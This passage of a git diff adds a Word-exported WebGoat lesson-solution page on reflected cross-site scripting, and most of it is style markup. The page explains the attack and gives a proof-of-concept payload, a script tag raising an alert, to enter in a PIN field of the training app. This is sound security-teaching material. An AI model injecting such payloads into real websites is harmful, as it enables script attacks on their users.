+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:612.0pt 792.0pt;
+	margin:72.0pt 72.0pt 72.0pt 72.0pt;
+	mso-header-margin:35.4pt;
+	mso-footer-margin:35.4pt;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="3074"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p style='background:white'><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>Lesson Plan Title:</span></b><span
+style='font-family:"Arial","sans-serif"'> How to Perform Reflected Cross Site
+Scripting (XSS) Attacks<o:p></o:p></span></p>
+
+<p style='background:white'><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>Concept / Topic To Teach:</span></b> <br>
+<span style='font-family:"Arial","sans-serif"'>It is always a good practice to validate
+all input on the server side. XSS can occur when unvalidated user input is used
+in an HTTP response. In a reflected XSS attack, an attacker can craft a URL
+with the attack script and post it to another website, email it, or otherwise
+get a victim to click on it. <o:p></o:p></span></p>
+
+<p style='background:white'><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>General Goal(s):</span> <br>
+</b><span style='font-family:"Arial","sans-serif"'>For this exercise, your
+mission is to come up with some input containing a script. You have to try to
+get this page to reflect that input back to your browser, which will execute
+the script and do something bad.<o:p></o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75"
+ coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe"
+ filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_1366" o:spid="_x0000_i1026" type="#_x0000_t75"
+ style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/ReflectedXSS_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/ReflectedXSS_files/image005.jpg" v:shapes="Picture_x0020_1366"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 15</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Enter
+&lt;script&gt;alert('Bang!')&lt;/script&gt; for the PIN value<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1367"
+ o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:270pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/ReflectedXSS_files/image003.png" o:title="" cropbottom="4085f"/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=360
+src="/WebGoat/lesson_solutions/ReflectedXSS_files/image006.jpg" v:shapes="Picture_x0020_1367"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 15 Completed<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<span style='font-size:12.0pt;font-family:"Times New Roman","serif";mso-fareast-font-family:
+"Times New Roman";mso-ansi-language:EN-US;mso-fareast-language:EN-US;
+mso-bidi-language:AR-SA'><br clear=all style='mso-special-character:line-break;
+page-break-before:always'>
+</span>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/ReflectedXSS_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/ReflectedXSS_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/ReflectedXSS_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/ReflectedXSS_files/filelist.xml b/main/project/WebContent/lesson_solutions/ReflectedXSS_files/filelist.xml
new file mode 100644
index 000000000..8ebcbe37d
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/ReflectedXSS_files/filelist.xml
@@ -0,0 +1,10 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../ReflectedXSS.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image005.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image006.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/ReflectedXSS_files/image001.png b/main/project/WebContent/lesson_solutions/ReflectedXSS_files/image001.png
new file mode 100644
index 000000000..6ff72a45b
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ReflectedXSS_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/ReflectedXSS_files/image003.png b/main/project/WebContent/lesson_solutions/ReflectedXSS_files/image003.png
new file mode 100644
index 000000000..e44f2e566
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ReflectedXSS_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/ReflectedXSS_files/image005.jpg b/main/project/WebContent/lesson_solutions/ReflectedXSS_files/image005.jpg
new file mode 100644
index 000000000..73cdb0bbf
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ReflectedXSS_files/image005.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/ReflectedXSS_files/image006.jpg b/main/project/WebContent/lesson_solutions/ReflectedXSS_files/image006.jpg
new file mode 100644
index 000000000..fb2e1977e
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ReflectedXSS_files/image006.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/ReflectedXSS_files/themedata.thmx b/main/project/WebContent/lesson_solutions/ReflectedXSS_files/themedata.thmx
new file mode 100644
